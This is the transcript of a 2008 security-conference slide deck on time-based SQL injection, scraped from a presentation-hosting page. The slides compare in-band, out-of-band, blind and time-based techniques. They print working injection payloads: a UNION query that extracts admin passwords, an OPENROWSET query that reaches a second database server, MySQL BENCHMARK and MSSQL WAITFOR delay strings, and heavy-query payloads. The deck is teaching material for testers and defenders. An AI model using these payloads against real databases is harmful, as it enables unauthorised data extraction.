Presentation is loading. Please wait.

Presentation is loading. Please wait.

© 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar.

Published byJames Bishop Modified over 8 years ago

Similar presentations

Presentation on theme: "© 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar."— Presentation transcript:

1 © 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar

2 © 2008 Security-Assessment.com 2 Who am I  Muhaimin Dzulfakar – 90% of kiwis can't pronounce it  Known as 'Emmie'  Security Consultant – Security-Assessment.com  Application and network pen-tester

3 © 2008 Security-Assessment.com 3 Agenda  What is time based SQL Injection  Differences between blind and time based SQL Injection  Time based injection with heavy queries  Limitation of time based SQL Injection

4 © 2008 Security-Assessment.com 4 Different types of SQL Injection  In Band Injection  Out of Band Injection  Blind SQL Injection  Time Based SQL Injection

5 © 2008 Security-Assessment.com 5 In Band Injection  Results are embedded via union select  Useful when SQL error message is displayed  Fastest way to extract data  Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*

6 © 2008 Security-Assessment.com 6 In Band Injection

7 © 2008 Security-Assessment.com 7 Out of Band Injection  Use a different communication channel to drill for data  Ex: Web Mail application in which data received via SMTP is processed  Example of attack: Accessing your neighbour database server with OOB injection  Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT  a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;  Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT  user, pass FROM users') AS a--

8 © 2008 Security-Assessment.com 8 Out of Band Injection Web server Database B Database A OOB Injection www.buyviagra.com 10.1.1.1

9 © 2008 Security-Assessment.com 9 Blind SQL Injection  Application generates custom error message for failed response and normal page for successful response  Comparison between true and false response  AND 1=1 -> true AND 1=2 -> false  Read data byte by byte

10 © 2008 Security-Assessment.com 10 Blind SQL Injection

11 © 2008 Security-Assessment.com 11 Blind SQL Injection

12 © 2008 Security-Assessment.com 12 Time Based SQL Injection  Use time based to compare between true and false  For true response – time delay is executed  For failed response – time delay is not executed  Read data byte by byte – exactly the same method with blind injection  First example by Chris Anley's paper – More advanced SQL Injection  Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference

13 © 2008 Security-Assessment.com 13 Why we need Time Based SQL Injection  When the application generates default page for true or false response  When the application generates the same custom error page for true or false response  Injection is successful but can't be seen by the attacker

14 © 2008 Security-Assessment.com 14 Scenario 1 (blind injection attack)‏$default=1 if value is not between 1-20 { redirect user to page.php?id=$default redirect user to page.php?id=$default } SQL statement SQL statement 1 AND 1=1 [TRUE] -> default page displayed 1 AND 1=2 [FALSE] -> default page displayed BLIND INJECTION FAILED BLIND INJECTION FAILED

15 © 2008 Security-Assessment.com 15 Scenario 1 (time based blind injection attack)‏$default=1 if value is not between 1-20 { redirect user to page.php?id=$default redirect user to page.php?id=$default } SQL statement SQL statement 1 AND 1=1 [TRUE] -> take 5 seconds to response 1 AND 1=2 [FALSE] -> take 1 second to response TIME BASED BLIND INJECTION SUCCESS TIME BASED BLIND INJECTION SUCCESS

16 © 2008 Security-Assessment.com 16 Scenario 2 (blind injection attack)‏ $values= 1 to 20 if the $values are not between 1-20 { redirect user to error.php redirect user to error.php } SQL statement SQL statement 1 AND 1=1 [TRUE] -> error page displayed 1 AND 1=2 [FALSE] -> error page displayed BLIND INJECTION FAILED BLIND INJECTION FAILED

17 © 2008 Security-Assessment.com 17 Scenario 2 (time based blind injection attack)‏ $values= 1 to 20 if the $values are not between 1-20 { redirect user to error.php redirect user to error.php } SQL statement SQL statement 1 AND 1=1 [TRUE] -> take 5 seconds to response 1 AND 1=2 [FALSE] -> take 1 second to response TIME BASED BLIND INJECTION SUCCESS TIME BASED BLIND INJECTION SUCCESS

18 © 2008 Security-Assessment.com 18 Time Based SQL Injection TRUE = 2478msFALSE = 117ms

19 © 2008 Security-Assessment.com 19 Spot the different  Blind injection (for mysql)‏  1 AND ASCII(substring((@@version),1,1))<52  if first character of database version is less than 4, it is  true  if first character of database version is 4 or more, it is  false query position operator char

20 © 2008 Security-Assessment.com 20 Spot the different  Time Based Blind injection (for MySQL)‏  1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))‏  if first character of database version is less than 4,  execute BENCHMARK  if first character of database version is not less than 4,  return 1 position operatortime delay query char count time

21 © 2008 Security-Assessment.com 21 Time Based Injection on MSSQL  Time based injection (MSSQL)‏  1 AND if not(substring((select \@\@version),25,1) < 52)‏  waitfor delay '0:0:9'--  if the first character less than 4, execute waitfor delay time delay query positionoperatorchar

22 © 2008 Security-Assessment.com 22 Other Databases  Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions  Time Based Injection is possible by using heavy queries  Chema Alonso and Jose Prada talked about this in Microsoft Security MVP Article and Defcon 2008  2 types of conditions in 'where clause'  Light Condition first  Heavy Condition first ConditionAConditionB  Select A from B where ConditionA and ConditionB

23 © 2008 Security-Assessment.com 23 Heavy condition first 100 Seconds False- 110 Seconds True 110 Seconds False True ResultHeavy & Light Condition Light Condition 10sec Heavy condition 100sec Result from Alonso research

24 © 2008 Security-Assessment.com 24 Light condition first 10Secon ds False- 110 Seconds True 110 Seconds False True ResultHeavy & Light Condition Heavy Condition 100sec Light condition 10sec Result from Alonso research

25 © 2008 Security-Assessment.com 25 Heavies Queries  Oracle evaluates the conditions from left to right  MS Access evaluates the conditions from right to left  MSSQL evaluates light condition first  Table name needs to be known  Default table can be used for testing  MSSQL – sysussers  MySQL – information_schema.colums  Oracle - all_users

26 © 2008 Security-Assessment.com 26 Heavies Queries  Example of time based injection using heavy queries on MSSQL (light condition evaluates first)‏  1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)‏  Suitable for databases that do not support time delay functions  Ex: Oracle and MS Access heavy query light query

27 © 2008 Security-Assessment.com 27 Limitation  Results are not efficient during busy times  How to get efficient results ?  Review the ipid checking (hping3)‏  Perform the test at 3am  Perform the test during Xmas  For heavy queries, time delay depends on how much data is stored in database  The more data, more efficient are the result

28 © 2008 Security-Assessment.com 28 Demo

29 © 2008 Security-Assessment.com 29 Question ? muhaimin.dzulfakar@security-assessment.com

Download ppt "© 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
PHP SQL. Connection code:- mysql_connect(server, username, password); Connect to the Database Server with the authorised user and password. Eg $connect.

PHP SQL. Connection code:- mysql_connect("server", "username", "password"); Connect to the Database Server with the authorised user and password. Eg $connect.
© 2008 Security-Assessment.com 1 Time Based SQL Injection Presented by Muhaimin Dzulfakar.

© 2008 Security-Assessment.com 1 Time Based SQL Injection Presented by Muhaimin Dzulfakar.
Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.

Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Lecture-5 Though SQL is the natural language of the DBA, it suffers from various inherent disadvantages, when used as a conventional programming language.

Lecture-5 Though SQL is the natural language of the DBA, it suffers from various inherent disadvantages, when used as a conventional programming language.
Dynamic Web Pages. Web Programming  All our web pages so far have been static pages. 1. We create a web page 2. We upload it to the web server 3. People.

Dynamic Web Pages. Web Programming  All our web pages so far have been static pages. 1. We create a web page 2. We upload it to the web server 3. People.
LCT2506 Internet 2 Further SQL Stored Procedures.

LCT2506 Internet 2 Further SQL Stored Procedures.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Chapter 7 Advanced SQL Database Systems: Design, Implementation, and Management, Sixth Edition, Rob and Coronel.

Chapter 7 Advanced SQL Database Systems: Design, Implementation, and Management, Sixth Edition, Rob and Coronel.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.

DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.
Oracle PL/SQL Injection David Litchfield. What is PL/SQL? Procedural Language / Structured Query Language Oracle’s extension to standard SQL Programmable.

Oracle PL/SQL Injection David Litchfield. What is PL/SQL? Procedural Language / Structured Query Language Oracle’s extension to standard SQL Programmable.
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.

Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
(Re) Playing with (Blind) SQL Injection

(Re) Playing with (Blind) SQL Injection
SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.

SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.

Similar presentations

Ads by Google